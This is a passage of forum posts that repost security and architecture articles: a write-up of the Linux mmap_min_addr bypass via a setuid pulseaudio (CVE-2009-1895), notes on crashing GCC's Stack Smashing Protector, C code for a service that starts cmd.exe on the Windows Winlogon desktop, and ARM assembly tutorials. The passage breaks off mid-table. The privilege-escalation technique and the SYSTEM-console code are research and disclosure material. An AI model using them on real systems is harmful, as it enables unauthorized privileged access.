  19. [h=3]Bypassing Linux' NULL pointer dereference exploit prevention (mmap_min_addr)[/h] EDIT3: Slashdot, the SANS Institute, Threatpost and others have a story about an exploit by Bradley Spengler which uses our technique to exploit a null pointer dereference in the Linux kernel. EDIT2: As of July 13th 2009, the Linux kernel integrates our patch (2.6.31-rc3). Our patch also made it into -stable. EDIT1: This is now referenced as a vulnerability and tracked as CVE-2009-1895 NULL pointers dereferences are a common security issue in the Linux kernel. In the realm of userland applications, exploiting them usually requires being able to somehow control the target's allocations until you get page zero mapped, and this can be very hard. In the paradigm of locally exploiting the Linux kernel however, nothing (before Linux 2.6.23) prevented you from mapping page zero with mmap() and crafting it to suit your needs before triggering the bug in your process' context. Since the kernel's data and code segment both have a base of zero, a null pointer dereference would make the kernel access page zero, a page filled with bytes in your control. Easy. This used to not be the case, back in Linux 2.0 when the kernel's data segment's base was above PAGE_OFFSET and the kernel had to explicitely use a segment override (with the fs selector) to access data in userland. The same rough idea is now used in PaX/GRSecurity's UDEREF to prevent exploitation of "unexpected to userland kernel accesses" (it actually makes use of an expand down segment instead of a PAGE_OFFSET segment base, but that's a detail). Kernel developpers tried to solve this issue too, but without resorting to segmentation (which is considered deprecated and is mostly not available on x86_64) and in a portable (cross architectures) way. In 2.6.23, they introduced a new sysctl, called vm.mmap_min_addr, that defines the minimum address that you can request a mapping at. Of course, this doesn't solve the complete issue of "to userland pointer dereferences" and it also breaks the somewhat useful feature of being able to map the first pages (this breaks Dosemu for instance), but in practice this has been effective enough to make exploitation of many vulnerabilities harder or impossible. Recently, Tavis Ormandy and myself had to exploit such a condition in the Linux kernel. We investigated a few ideas, such as: using brk() creating a MAP_GROWSDOWN mapping just above the forbidden region (usually 64K) and segfaulting the last page of the forbidden region obscure system calls such as remap_file_pages putting memory pressure in the address space to let the kernel allocate in this region using the MAP_PAGE_ZERO personality All of them without any luck at first. The LSM hook responsible for this security check was correctly called every time. So what does the default security module do in cap_file_mmap? This is the relevant code (in security/capability.c on recent versions of the Linux kernel): if ((addr < mmap_min_addr) && !capable(CAP_SYS_RAWIO)) return -EACCES; return 0; Meaning that a process with CAP_SYS_RAWIO can bypass this check. How can we get our process to have this capability ? By executing a setuid binary of course! So we set the MMAP_PAGE_ZERO personality and execute a setuid binary. Page zero will get mapped, but the setuid binary is executing and we don't have control anymore. So, how do we get control back ? Using something such as "/bin/su our_user_name" could be tempting, but while this would indeed give us control back, su will drop privileges before giving us control back (it'd be a vulnerability otherwise!), so the Linux kernel will make exec fail in the cap_file_mmap check (due to the MMAP_PAGE_ZERO personality). So what we need is a setuid binary that will give us control back without going through exec. We found such a setuid binary that is installed on many Desktop Linux machines by default: pulseaudio. pulseaudio will drop privileges and let you specify a library to load though its -L argument. Exactly what we needed! Once we have one page mapped in the forbidden area, it's game over. Nothing will prevent us from using mremap to grow the area and mprotect to change our access rights to PROT_READ|PROT_WRITE|PROT_EXEC. So this completely bypasses the Linux kernel's protection. Note that apart from this problem, the mere fact that MMAP_PAGE_ZERO is not in the PER_CLEAR_ON_SETID mask and thus is allowed when executing setuid binaries can be a security issue: being able to map page zero in a process with euid=0, even without controlling its content could be useful when exploiting a null pointer vulnerability in a setuid application. We believe that the correct fix for this issue is to add MMAP_PAGE_ZERO to the PER_CLEAR_ON_SETID mask. PS: Thanks to Robert Swiecki for some help while investigating this. Posted by Julien Tinnes at 11:37 AM Sursa: cr0 blog: Bypassing Linux' NULL pointer dereference exploit prevention (mmap_min_addr)
  20. [h=1]Adventure with Stack Smashing Protector (SSP)[/h] by pi3 Introduction. I was heavily playing with Stack Smashing Protector a few years ago. Some of my research (observation) I decided to publish on phrack magazine but not everything. Two years ago my professional life moved to the Windows environment and unfortunately I didn’t have time to play with UNIX world as much as before. One weekend I decided to reanalyze SSP code again and this write-up is describing a few of my observations I’ve made during the work… … which can be shortly summarized as: Not security related… We can change program’s name (from SSP perspective) via overwriting memory region where pointer to “argv[0]” points to. We can crash Stack Smashing Protector code in many ways: Via corrupting memory region pointed by “__environ” variable. Via setting “LIBC_FATAL_STDERR_” to the edge of valid addresses. Via forcing “alloca()” to fail – e.g. stack exhaustion. There is one more bug which I’m analyzing more comprehensively at point 4. It may indirectly force SSP to crash. It exists in DWARF stack (state) machine which is responsible for gathering information about the stack trace (“__backtrace()”) and prints it. We can slightly control SSP’s execution flow. (Un)Fortunately it doesn’t have any influence for the main execution (what about security?). Following scenarios are possible: Force SSP to open “/dev/tty” Force SSP not to open “/dev/tty” and assign to the “fd” descriptor “STDERR_FILENO” value: #define STDERR_FILENO 2 /* Standard error output. */ Crash SSP via 2b. scenario We can crash indirectly SSP via unwinding algorithm (read-AV or we can be killed by “gcc_unreachable” or “gcc_assert” function) – DWARF stack (state) machine: Somehow security related… We can force SSP to allocate a lot of memory and cause Denial of Service via Resource Exhaustion attack. Theoretical Information leak: Full write-up is available here Best regards, Adam ‘pi3? Zabrocki Sursa: Adventure with Stack Smashing Protector (SSP) : pi3 blogStack cookie information leak. Any kind of information leak File corruption. Simulate FDE object was not found Simulate FDE object was found.
  21. [h=2]Running processes on the Winlogon desktop[/h] Disclaimer: this is a Bad Idea unless you know exactly what you’re doing, why you’re doing it and there are no alternatives. Please use responsibly. There may be circumstances where you’d like to programmatically interact with the Winlogon desktop (the one that houses the LogonUI process responsible for displaying logon tiles and the rest of, well, logon UI). Test automation, seamless VM integration, whatever. It’s not easy though, and for good reasons: Logon desktop created by Winlogon has ACL that only grants access to the SYSTEM account. We need a service to access it. Changing that ACL to allow other accounts is a very bad idea. When a user chooses “Switch user” from the Start Menu or when the system first boots and displays the logon UI, it’s all done in a separate session. If a new user logs on, the Winlogon session is reused for that user’s interactive logon. If there is no new logon (but a user switch or unlocking a locked session for example), the Winlogon session is destroyed. Temporary processes in a Winlogon session after locking/unlocking user session So, our service needs to monitor session changes and act when a Winlogon session is created (and made interactive). The code below demonstrates how you can create a process that runs on the Winlogon desktop and can interact with it. #include <windows.h>#include "log.h" #define SERVICE_NAME TEXT("QTestService") SERVICE_STATUS g_Status; SERVICE_STATUS_HANDLE g_StatusHandle; HANDLE g_ConsoleEvent; DWORD g_TargetSessionId; void ServiceMain(int argc, TCHAR *argv[]); DWORD ControlHandlerEx(DWORD controlCode, DWORD eventType, void *eventData, void *context); WCHAR *g_SessionEventName[] = { L"<invalid>", L"WTS_CONSOLE_CONNECT", L"WTS_CONSOLE_DISCONNECT", L"WTS_REMOTE_CONNECT", L"WTS_REMOTE_DISCONNECT", L"WTS_SESSION_LOGON", L"WTS_SESSION_LOGOFF", L"WTS_SESSION_LOCK", L"WTS_SESSION_UNLOCK", L"WTS_SESSION_REMOTE_CONTROL", L"WTS_SESSION_CREATE", L"WTS_SESSION_TERMINATE" }; // Entry point. int main(int argc, TCHAR *argv[]) { SERVICE_TABLE_ENTRY serviceTable[] = { {SERVICE_NAME, ServiceMain}, {NULL, NULL} }; log_init(NULL, TEXT("qservice")); logf("main: start"); StartServiceCtrlDispatcher(serviceTable); logf("main: end"); } DWORD WINAPI WorkerThread(void *param) { TCHAR *cmdline; PROCESS_INFORMATION pi; STARTUPINFO si; HANDLE newToken; DWORD sessionId; DWORD size; HANDLE currentToken; HANDLE currentProcess = GetCurrentProcess(); cmdline = (TCHAR*) param; // Wait until the interactive session changes (to winlogon console). WaitForSingleObject(g_ConsoleEvent, INFINITE); // Get access token from ourselves. OpenProcessToken(currentProcess, TOKEN_ALL_ACCESS, &currentToken); // Session ID is stored in the access token. For services it's normally 0. GetTokenInformation(currentToken, TokenSessionId, &sessionId, sizeof(sessionId), &size); logf("current session: %d", sessionId); // We need to create a primary token for CreateProcessAsUser. if (!DuplicateTokenEx(currentToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &newToken)) { perror("DuplicateToken"); return GetLastError(); } CloseHandle(currentProcess); // g_TargetSessionId is set by SessionChange() handler after a WTS_CONSOLE_CONNECT event. // Its value is the new console session ID. In our case it's the "logon screen". sessionId = g_TargetSessionId; logf("Running process '%s' in session %d", cmdline, sessionId); // Change the session ID in the new access token to the target session ID. // This requires SeTcbPrivilege, but we're running as SYSTEM and have it. if (!SetTokenInformation(newToken, TokenSessionId, &sessionId, sizeof(sessionId))) { perror("SetTokenInformation(TokenSessionId)"); return GetLastError(); } // Create process with the new token. ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); // Don't forget to set the correct desktop. si.lpDesktop = TEXT("WinSta0\\Winlogon"); if (!CreateProcessAsUser(newToken, 0, cmdline, 0, 0, 0, 0, 0, 0, &si, ?)) { perror("CreateProcessAsUser"); return GetLastError(); } return ERROR_SUCCESS; } void ServiceMain(int argc, TCHAR *argv[]) { TCHAR *cmdline = TEXT("cmd.exe"); HANDLE workerHandle; logf("ServiceMain: start"); g_Status.dwServiceType = SERVICE_WIN32; g_Status.dwCurrentState = SERVICE_START_PENDING; // SERVICE_ACCEPT_SESSIONCHANGE allows us to receive session change notifications. g_Status.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN | SERVICE_ACCEPT_SESSIONCHANGE; g_Status.dwWin32ExitCode = 0; g_Status.dwServiceSpecificExitCode = 0; g_Status.dwCheckPoint = 0; g_Status.dwWaitHint = 0; g_StatusHandle = RegisterServiceCtrlHandlerEx(SERVICE_NAME, ControlHandlerEx, NULL); if (g_StatusHandle == 0) { perror("RegisterServiceCtrlHandlerEx"); goto stop; } g_Status.dwCurrentState = SERVICE_RUNNING; SetServiceStatus(g_StatusHandle, &g_Status); // Create trigger event for the worker thread. g_ConsoleEvent = CreateEvent(NULL, FALSE, FALSE, NULL); // Start the worker thread. logf("Starting worker thread"); workerHandle = CreateThread(NULL, 0, WorkerThread, cmdline, 0, NULL); if (!workerHandle) { perror("CreateThread"); goto stop; } // Wait for the worker thread to exit. WaitForSingleObject(workerHandle, INFINITE); stop: logf("exiting"); g_Status.dwCurrentState = SERVICE_STOPPED; g_Status.dwWin32ExitCode = GetLastError(); SetServiceStatus(g_StatusHandle, &g_Status); logf("ServiceMain: end"); return; } void SessionChange(DWORD eventType, WTSSESSION_NOTIFICATION *sn) { if (eventType < RTL_NUMBER_OF(g_SessionEventName)) logf("SessionChange: %s, session ID %d", g_SessionEventName[eventType], sn->dwSessionId); else logf("SessionChange: <unknown event: %d>, session id %d", eventType, sn->dwSessionId); if (eventType == WTS_CONSOLE_CONNECT) { // Store the new session ID for the worker thread and signal the trigger event. g_TargetSessionId = sn->dwSessionId; SetEvent(g_ConsoleEvent); } } DWORD ControlHandlerEx(DWORD control, DWORD eventType, void *eventData, void *context) { switch(control) { case SERVICE_CONTROL_STOP: case SERVICE_CONTROL_SHUTDOWN: g_Status.dwWin32ExitCode = 0; g_Status.dwCurrentState = SERVICE_STOPPED; logf("stopping..."); SetServiceStatus(g_StatusHandle, &g_Status); break; case SERVICE_CONTROL_SESSIONCHANGE: SessionChange(eventType, (WTSSESSION_NOTIFICATION*) eventData); break; default: logf("ControlHandlerEx: code 0x%x, event 0x%x", control, eventType); break; } return ERROR_SUCCESS; } [TABLE=class: easySpoilerTable, align: center] [TR] [/TR] [TR] [TD=class: easySpoilerRow, colspan: 2][/TD] [/TR] [/TABLE] You can install the service using following command (mind the spaces): C:\>sc create QTestService binPath= d:\test\QService.exe type= own start= demand [sC] CreateService SUCCESS Then start it with: sc start QTestService After starting, choose “Switch user” or“Lock” from the Start Menu. You should see a console window on the logon screen. ~ by omeg on January 29, 2014. Sursa: » Running processes on the Winlogon desktop - Spinning mirrors
  22. [h=3]Understanding ARM Assembly Part 1[/h]ntdebug 22 Nov 2013 3:38 PM 10 My name is Marion Cole, and I am a Sr. EE in Microsoft Platforms Serviceability group. You may be wondering why Microsoft support would need to know ARM assembly. Doesn’t Windows only run on x86 and x64 machines? No. Windows has ran on a variety of processors in the past. Those include i860, Alpha, MIPS, Fairchild Clipper, PowerPC, Itanium, SPARC, 286, 386, IA-32, x86, x64, and the newest one is ARM. Most of these processors are antiquated now. The common ones now are IA-32, x86, x64. However Windows has started supporting ARM processors in order to jump into the portable devices arena. You will find them in the Microsoft Surface RT, Windows Phones, and other things in the future I am sure. So you may be saying that these devices are locked, and cannot be debugged. That is true from a live debug perspective, but you can get memory dumps and application dumps from them and those can be debugged. Processor There are limitations on ARM processors that Windows supports. There are 3 System on Chip (SOC) vendors that are supported. nVidia, Texas-Instruments, and Qualcomm. Windows only supports the ARMv7 (Cortex, Scorpion) architecture in ARMv7-A in (Application Profile) mode. This implements a traditional ARM architecture with multiple modes and supporting a Virtual Memory System Architecture (VMSA) based on an MMU. It supports the ARM and Thumb-2 instruction sets which allows for a mixture of 16 (Thumb) and 32 (ARM) bit opcodes. So it will look strange in the assembly. Luckily the debuggers know this and handle it for you. This also helps to shrink the size of the assembly code in memory. The processor also has to have the Optional ISA extensions of VFP (Hardware Floating Point) and NEON (128-bit SIMD Architecture). In order to understand the assembly that you will see you need to understand the processor internals. ARM is a Reduced Instruction Set Computer (RISC) much like some of the previous processors that Windows ran on. It is a 32 bit load/store style processor. It has a “Weakly-ordered” memory model: similar to Alpha and IA64, and it requires specific memory barriers to enforce ordering. In ARM devices these as ISB, DSB, and DMB instructions. Registers The processor has 16 available registers r0 – r15. 0: kd> r r0=00000001 r1=00000000 r2=00000000 r3=00000000 r4=e1820044 r5=e17d0580 r6=00000001 r7=e17f89b9 r8=00000002 r9=00000000 r10=1afc38ec r11=e1263b78 r12=e127813c sp=e1263b20 lr=e16c12c3 pc=e178b6d0 psr=00000173 ----- Thumb r0, r1, r2, r3, and r12 are volatile registers. Volatile registers are scratch registers presumed by the caller to be destroyed across a call. Nonvolatile registers are required to retain their values across a function call and must be saved by the callee if used. On Windows four of these registers have a designated purpose. Those are: PC (r15) – Program Counter (EIP on x86) LR (r14) – Link Register. Used as a return address to the caller. SP (r13) – Stack Pointer (ESP on x86). R11 – Frame Pointer (EBP on x86). CPSR – Current Program Status Register (Flags on x86). In Windbg all but r11 will be labeled appropriately for you. So you may be asking why r11 is not labeled “fp” in the debugger. That is because r11 is only used as a frame pointer when you are calling a non-leaf subroutine. The way it works is this: when a call to a non-leaf subroutine is made, the called subroutine pushes the value of the previous frame pointer (in r11) to the stack (right after the lr) and then r11 is set to point to this location in the stack, so eventually we end up with a linked list of frame pointers in the stack that easily enables the construction of the call stack. The frame pointer is not pushed to the stack in leaf functions. Will discuss leaf functions later. CPSR (Current Program Status Register) Now we need to understand some about the CPSR register. Here is the bit breakdown: [TABLE] [TR] [TD]31 [/TD] [TD]30 [/TD] [TD]29 [/TD] [TD]28 [/TD] [TD]27 [/TD] [TD]26 [/TD] [TD]25 [/TD] [TD]24 [/TD] [TD]23 [/TD] [TD]22 [/TD] [TD]21 [/TD] [TD]20 [/TD] [TD]19 [/TD] [TD]18 [/TD] [TD]17 [/TD] [TD]16 [/TD] [TD]15 [/TD] [TD]14 [/TD] [TD]13 [/TD] [TD]12 [/TD] [TD]11 [/TD] [TD]10 [/TD] [TD]9 [/TD] [TD]8 [/TD] [TD]7 [/TD] [TD]6 [/TD] [TD]5 [/TD] [TD]4 [/TD] [TD]3 [/TD] [TD]2 [/TD] [TD]1 [/TD] [TD]0 [/TD] [/TR] [TR] [TD]N [/TD] [TD]Z [/TD] [TD]C [/TD] [TD]V [/TD] [TD]Q [/TD] [TD=colspan: 2]IT [/TD] [TD]J [/TD] [TD=colspan: 4]Reserved [/TD] [TD=colspan: 4]GE [/TD] [TD=colspan: 6]IT [/TD] [TD]E [/TD] [TD]A [/TD] [TD]I [/TD] [TD]F [/TD] [TD]T [/TD] [TD=colspan: 5]M [/TD] [/TR] [/TABLE] Bits [31:28] – Condition Code Flags N – bit 31 – If this bit is set, the result was negative. If bit is cleared the result was positive or zero. Z – bit 30 – If set this bit indicates the result was zero or values compared were equal. If it is cleared, the value is non-zero or the compared values are not equal. C – bit 29 – If this bit is set the instruction resulted in a carry condition. E.g. Adding two unsigned values resulted in a value too large to be strored. V – bit 28 – If this bit is set then the instruction resulted in an overflow condition. E.g. An overflow of adding two signed values. [*]Instructions variants ending with ‘s’ set the condition codes (mov/movs) [*]E – bit 9 – Endianness (big = 1/Little = 0) [*]T – bit 5 – Set if executing Thumb instructions [*]M – bits [4:0] – CPU Mode (User 10000/Supervisor 10011) So why do I need to know about the CPSR (Current Program Status Register)? You will need to know where some of these bits are due to how some of the assembly instruction affect these flags. Example of this is: ADD will add two registers together, or add an immediate value to a register. However it will not affect the flags. ADDS will do the same as ADD, but it does affect the flags. MOV will allow you to move a value into a register, and a value between registers. This is not like the x86/x64. MOV will not let you read or write to memory. This does not affect the flags. MOVS does the same thing as MOV, but it does affect the flags. I hope you are seeing a trend here. There are instructions that will look the same. However if they end in “S” then you need to know that this will affect the flags. I am not going to list all of those assembly instructions here. Those are already listed in the ARM Architecture Reference Manual ARMv7-A and ARMv7-R edition at ARM Architecture Reference Manual ARMv7-A and ARMv7-R edition. So now we have an idea of what can set the flags. Now we need to understand what the flags are used for. They are mainly used for branching instructions. Here is an example: 003a11d2 429a cmp r2,r3 003a11d4 d104 bne |MyApp!FirstFunc+0x28 (003a11e0)| The first instruction in this code (cmp) compares the value stored in register r2 to the value stored in register r3. This comparison instruction sets or resets the Z flag in the CPSR register. The second instruction is a branch instruction ( with the condition code ne which means that if the result of the previous comparison was that the values are not equal (the CPSR flag Z is zero) then branch to the address MyApp!FirstFunc+0x28 (003a11e0). Otherwise the execution continues. There are a few compare instructions. “cmp” subtracts two register values, sets the flags, and discards the result. “cmn” adds two register values, sets the flags, and discards the results. “tst” does a bit wise AND of two register values, sets the flags, and discards the results. There is even an If Then (it) instruction. I am not going to discuss that one here as I have never seen it in any of the Windows code. So is “bne” the only branch instruction? No. There is a lot of them. Here is a table of things that can be seen beside “b”, and what they check the CPSR register: [TABLE] [TR] [TD]Mnemonic Extension [/TD] [TD]Meaning (Integer) [/TD] [TD]Condition Flags (in CPSR) [/TD] [/TR] [TR] [TD]EQ [/TD] [TD]Equal [/TD] [TD]Z==1 [/TD] [/TR] [TR] [TD]NE [/TD] [TD]Not Equal [/TD] [TD]Z==0 [/TD] [/TR] [TR] [TD]MI [/TD] [TD]Negative (Minus) [/TD] [TD]N==1 [/TD] [/TR] [TR] [TD]PL [/TD] [TD]Positive or Zero (Plus) [/TD] [TD]N==0 [/TD] [/TR] [TR] [TD]HI [/TD] [TD]Unsigned higher [/TD] [TD]C==1 and Z==0 [/TD] [/TR] [TR] [TD]LS [/TD] [TD]Unsigned lower or same [/TD] [TD]C==0 or Z==1 [/TD] [/TR] [TR] [TD]GE [/TD] [TD]Signed greater than or equal [/TD] [TD]N==V [/TD] [/TR] [TR] [TD]LT [/TD] [TD]Signed less than [/TD] [TD]N!=V [/TD] [/TR] [TR] [TD]GT [/TD] [TD]Signed greater than [/TD] [TD]Z==0 and N==V [/TD] [/TR] [TR] [TD]LE [/TD] [TD]Signed less than or equal [/TD] [TD]Z==1 or N!=V [/TD] [/TR] [TR] [TD]VS [/TD] [TD]Overflow [/TD] [TD]V==1 [/TD] [/TR] [TR] [TD]VC [/TD] [TD]No overflow [/TD] [TD]V==0 [/TD] [/TR] [TR] [TD]CS [/TD] [TD]Carry set [/TD] [TD]C==1 [/TD] [/TR] [TR] [TD]CC [/TD] [TD]Carry clear [/TD] [TD]C==0 [/TD] [/TR] [TR] [TD]None (AL) [/TD] [TD]Execute always [/TD] [TD] [/TD] [/TR] [/TABLE] Floating Point Registers As mentioned earlier the processor also has to have the ISA extensions of VFP (Hardware Floating Point) and NEON (128-bit SIMD Architecture). Here is what they are. Floating Point As you can see this is 16 – 64bit regiters (d0-d15) that is overlaid with 32 – 32bit registers (s0-s31). There are varieties of the ARM processor that has 32 – 64bit registers and 64 – 32bit registers. Windows 8 will support both 16 and 32 register variants. You have to be careful when using these, because if you access unaligned floats you may cause an exception. SIMD (NEON) As you can see here the SIMD (NEON) extension adds 16 – 128 bit registers (q0-q15) onto the floating point registers. So if you reference Q0 it is the same as referencing D0-D1 or S0-S1-S2-S3. In part 2 we will discuss how Windows utilizes this processor. Sursa: Understanding ARM Assembly Part 1 - Ntdebugging Blog - Site Home - MSDN Blogs
  23. [h=1]Introduction to ARMv8 64-bit Architecture[/h] April 9, 2014 By PnUic Leave a Comment [h=2]Introduction[/h] The ARM architecture is a Reduced Instruction Set Computer (RISC) architecture, indeed its originally stood for “Acorn RISC Machine” but now stood for “Advanced RISC Machines”. In the last years, ARM processors, with the diffusion of smartphones and tablets, are beginning very popular: mostly this is due to reduced costs, and a more power efficiency compared to other architectures as CISC: Complex Instruction Set Computer (CISC) processors, like the x86, have a rich instruction set capable of doing complex things with a single instruction. Such processors often have significant amounts of internal logic that decode machine instructions to sequences of internal operations (microcode).RISC architectures, in contrast, have a smaller number of more general purpose instructions, that might be executed with significantly fewer transistors, making the silicon cheaper and more power efficient. Like other RISC architectures, ARM cores have a large number of general-purpose registers and many instructions execute in a single cycle. It has simple addressing modes, where all load/store addresses can be determined from register contents and instruction fields. RISC architectures (ARM, Mips, …) peculiarity: The load/store architecture only allows memory to be accessed by load and store operations, and all values for an operation need to be loaded from memory and be present in registers, so operations as “add reg,[address]” are not permitted! Another difference with CISC architectures: when a Branch and Link is called (in Intel arch. is the “call” operation) the return address is stored in a special register and not in the stack. A lack into ARM architecture is the absence of multi-threading support, which is present in many others architectures as: Intel and Mips. Cause of AArch32 (32bit) is most documented: Arm on wiki, Cambridge University – Operation System Development I decided to talk only about AArch64 (64bit). [h=2]Processors:[/h] A short ARM processors list: Classic or Cortext-A: with DSP, Floating Point, TrustZone e Jazelle extensions. ARMv5 e ARM6 (2001) Cortex-M: ARM Thumb®-2 technology which provides excellent code density. With Thumb-2 technology, the Cortex-M processors support a fundamental base of 16-bit Thumb instructions, extended to include more powerful 32-bit instructions. First Multi-core. (2004) Cortex-R: ARMv7 Deeply pipelined micro-architecture,Flexible Multi-Processor Core (MPCore) configurations:Symmetric Multi-Processing (SMP) & Asymmetric Multi-Processing (AMP), LPAE extension. Cortex-A50: ARMv8-A 64bit with load-acquire and store-release features , which are an excellent match for the C++11, C11 and Java memory models. (2011) [h=3]Extensions[/h] With every new version of ARM, there’re new extensions provided, the v8 architecture has these: Jazelle is a Java hardware/software accelerator: “ARM Jazelle DBX (Direct Bytecode eXecution) technology for direct bytecode execution of Java”. On Sofware side: Jazelle MobileVM is a complete JVM which is Multi-tasking, engineered to provide high performance multi-tasking in a very small memory footprint Floating Point: for floating point operations NEON: the ARM SIMD 128 bit (Single instruction, multiple data) engine and DSP the SIMD 32bit engine useful to make linear algebra operations Cryptographic Extension is an extension of the SIMD support and operates on the vector register file. It provides instructions for the acceleration of encryption and decryption to support the following: AES, SHA1, SHA2-256. TrustZone: is a system-wide approach to security for a wide array of client and server computing platforms include payment protection technology, digital rights management, BYOD, and a host of secured enterprise solutions Virtualization Extensions with the Large Physical Address Extension (LPAE) enable the efficient implementation of virtual machine hypervisors for ARM architecture compliant processors. The visualization extensions provide the basis for ARM architecture compliant processors to address the needs of both client and server devices for the partitioning and management of complex software environments into virtual machines. The Large Physical Address extension provides the means for each of the software environments to utilize efficiently the available physical memory when handling large amounts of data [h=2]Architectures[/h] AArch64 the ARMv8-A 64-bit execution state, that uses 31 64-bit general purpose registers (R0-R30), and a 64-bit program counter (PC), stack pointer (SP), and exception link registers(ELR). Provides 32 128-bit registers for SIMD vector and scalar floating-point support (V0-V31). A64 instructions have a fixed length of 32 bits and are always little-endian. AArch32 is the ARMv8-A 32-bit execution state, that uses 13 32-bit general purpose registers (R0-R12), a 32-bit program counter (PC), stack pointer (SP), and link register (LR). Provides 32 64-bit registers for Advanced SIMD vector and scalar floating-point support. AArch32 execution state provides a choice of two instruction sets, A32 (ARM) and T32 (Thumb2). Operation in AArch32 state is compatible with ARMv7-A operation. T32: 16-bit instructions are decompressed transparently to full 32-bit ARM instructions in real time without performance loss.Thumb-2 technology made Thumb a mixed (32- and 16-bit) length instruction set [h=2]Data types[/h] Data types are simply these: Byte: 8 bits. Halfword: 16 bits. Word: 32 bits. Doubleword: 64 bits. Quadword: 128 bits. The architecture also supports the following floating-point data types: Half-precision floating-point formats. Single-precision floating-point format. Double-precision floating-point format. In this short guide, I don’t talk about floating point assembly instructions to don’t make it too long, if you want know more about, you can see the ARM Architecture Reference Manual. [h=2]Exception levels[/h] There’re four exception levels, which replaces the 8 different processor modes, they work as the ring in Intel architectures, they are a form of privilege hierarchy: EL0 is the least privileged level, indeed it is called unprivileged execution. Apps are runned here. EL1: here can be runned OS kernel EL2: provides support for virtualization of Non-secure operation. Hypervisor can runned here. EL3 provides support for switching between two Security states, Secure state and Non-secure state. Secure monitor can be runned here. When executing in AArch64 state, execution can move between Exception levels only on taking an exception or on returning from an exception. Each of the 4 privilege levels has 3 private banked registers: the Exception Link Register, Stack Pointer and Saved PSR. [h=3]Interprocessing: AArch64 <=> AArch32[/h] Interprocessing is the term used to describe moving between the AArch64 and AArch32 Execution states. The Execution state can change only on a change of Exception level. This means that the Execution state can change only on taking an exception to a higher Exception level, or returning from an exception to a lower Exception level. On taking an exception to a higher Exception level, the Execution state either: Remains unchanged. Changes from AArch32 state to AArch64 state. On returning from an exception to a lower Exception level, the Execution state either: Remains unchanged. Changes from AArch64 state to AArch32 state. [h=2]The A64 Register[/h] A64 has 31 general-purpose registers (integer) more the zero register and the current stack pointer register, here all the registers: [TABLE] [TR] [TD]Wn[/TD] [TD]32 bits[/TD] [TD]General-purpose register: n can be 0-30[/TD] [/TR] [TR] [TD]Xn[/TD] [TD]64 bits[/TD] [TD]General-purpose register: n can be 0-30[/TD] [/TR] [TR] [TD]WZR[/TD] [TD]32 bits[/TD] [TD]Zero register[/TD] [/TR] [TR] [TD]XZR[/TD] [TD]64 bits[/TD] [TD]Zero register[/TD] [/TR] [TR] [TD]WSP[/TD] [TD]32 bits[/TD] [TD]Current stack pointer[/TD] [/TR] [TR] [TD]SP[/TD] [TD]64 bits[/TD] [TD]Current stack pointer[/TD] [/TR] [/TABLE] How registers should be using by compilers and programmers: r30 (LR): The Link Register, is used as the subroutine link register (LR) and stores the return address when Branch with Link operations are performed. r29 (FP): The Frame Pointer r19…r28: Callee-saved registers r18: The Platform Register, if needed; otherwise a temporary register. r17 (IP1): The second intra-procedure-call temporary register (can be used by call veneers and PLT code); at other times may be used as a temporary register. r16 (IP0): The first intra-procedure-call scratch register (can be used by call veneers and PLT code); at other times may be used as a temporary register. r9…r15: Temporary registers r8: Indirect result location register r0…r7: Parameter/result registers The PC (program counter) has a limited access, only few instructions, as BL and ADL, can modify it. [h=2]The use of Stack[/h] The stack implementation is full-descending: in a push the stack pointer is decremented, i.e the stack grows towards lower address. Another features is that stack must be quad-word aligned: SP mod 16 = 0. A64 instructions can use the stack pointer only in a limited number of cases: Load/Store instructions use the current stack pointer as the base address: When stack alignment checking is enabled by system software and the base register is SP, the current stack pointer must be initially quadword aligned, That is, it must be aligned to 16 bytes. Misalignment generates a Stack Alignment fault. Add and subtract data processing instructions in their immediate and extended register forms, use the current stack pointer as a source register or the destination register or both. Logical data processing instructions in their immediate form use the current stack pointer as the destination register. [h=2]Process State[/h] PSTATE (process state, CPSR on AArch32) holds process state related information, his flags will be change with compare instructions, for example, so it is used by processor to see if make a branch (jump in Intel terminology) or not. [TABLE] [TR] [TD]N, Z, C, V, D, A, I, F, SS, IL, EL, nRW, SP, Q, GE, IT, J, T, E, M[/TD] [TD]Negative condition flag Zero condition flag Carry condition flag oVerflow condition flag Debug mask bit [AArch64 only] Asynchronous abort mask bit IRQ mask bit FIQ mask bit Software step bit Illegal execution state bit Exception Level (see above) not Register Width: 0=64, 1=32 Stack pointer select: 0=SP0, 1=SPx [AArch32 only] Cumulative saturation flag [AArch32 only] Greater than or Equal flags [AArch32 only] If-then execution state bits [AArch32 only] J execution state bit [AArch32 only] T32 execution state bit [AArch632 only] Endian execution state bit [AArch32 only] Mode field (see above) [AArch32 only][/TD] [/TR] [/TABLE] The first four flags are the Condition flags (NZCV), and they are the mostly used by processors: N: Negative condition flag. If the result is regarded as a two’s complement signed integer, then the PE sets N to 1 if the result is negative, and sets N to 0 if it is positive or zero. Z: Zero condition flag. Set to 1 if the result of the instruction is zero, and to 0 otherwise. A result of zero often indicates an equal result from a comparison. C: Carry condition flag. Set to 1 if the instruction results in a carry condition, for example an unsigned overflow that is the result of an addition. V: Overflow condition flag. Set to 1 if the instruction results in an overflow condition, for example a signed overflow that is the result of an addition [h=2]Condition code suffixes[/h] This suffixes are used by the Branch conditionally instruction, here a table useful to understand what they mean: [TABLE] [TR] [TH]Suffix[/TH] [TH]Flags[/TH] [TH]Meaning[/TH] [/TR] [TR] [TD]EQ[/TD] [TD]Z set[/TD] [TD]Equal[/TD] [/TR] [TR] [TD]NE[/TD] [TD]Z clear[/TD] [TD]Not equal[/TD] [/TR] [TR] [TD]CS or HS[/TD] [TD]C set[/TD] [TD]Higher or same (unsigned >= )[/TD] [/TR] [TR] [TD]CC or LO[/TD] [TD]C clear[/TD] [TD]Lower (unsigned < )[/TD] [/TR] [TR] [TD]MI[/TD] [TD]N set[/TD] [TD]Negative[/TD] [/TR] [TR] [TD]PL[/TD] [TD]N clear[/TD] [TD]Positive or zero[/TD] [/TR] [TR] [TD]VS[/TD] [TD]V set[/TD] [TD]Overflow[/TD] [/TR] [TR] [TD]VC[/TD] [TD]V clear[/TD] [TD]No overflow[/TD] [/TR] [TR] [TD]HI[/TD] [TD]C set and Z clear[/TD] [TD]Higher (unsigned >)[/TD] [/TR] [TR] [TD]LS[/TD] [TD]C clear or Z set[/TD] [TD]Lower or same (unsigned <=)[/TD] [/TR] [TR] [TD]GE[/TD] [TD]N and V the same[/TD] [TD]Signed >=[/TD] [/TR] [TR] 